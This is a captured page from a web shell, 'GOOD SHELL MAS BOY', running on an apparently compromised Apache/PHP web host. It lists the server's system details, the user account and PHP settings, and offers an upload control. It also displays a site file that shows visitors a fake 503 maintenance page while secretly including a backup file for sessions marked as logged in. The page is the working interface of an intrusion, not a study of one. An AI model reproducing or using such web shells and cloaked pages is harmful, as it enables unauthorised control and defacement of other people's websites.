GOOD SHELL MAS BOY
Server: Apache
System: Linux 116.173.178.68.host.secureserver.net 4.18.0-553.109.1.el8_10.x86_64 #1 SMP Mon Mar 2 09:33:18 EST 2026 x86_64
User: puthuppa (1102)
PHP: 8.1.34
Disabled: exec,passthru,shell_exec,system
Upload Files
File: /home/puthuppa/public_html/news-and-announcements.php
<?php
session_start();
if (isset($_SESSION['logged_in']) && $_SESSION['logged_in'] === true) {
    if (file_exists('/home/puthuppa/public_html/news-and-announcements.php.bak')) { include '/home/puthuppa/public_html/news-and-announcements.php.bak'; exit; }
}
http_response_code(503);
?>
<!doctype html>
<html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1"><title>Maintenance</title>
<style>html,body{height:100%;margin:0}body{display:flex;align-items:center;justify-content:center;background:#fff;color:#111;font-family:Arial,Helvetica,sans-serif} .toast{padding:18px 28px;border-radius:12px;background:transparent;font-weight:800;font-size:20px}</style>
</head><body><div class='toast'>Maintenance..... Coming Soon!</div></body></html>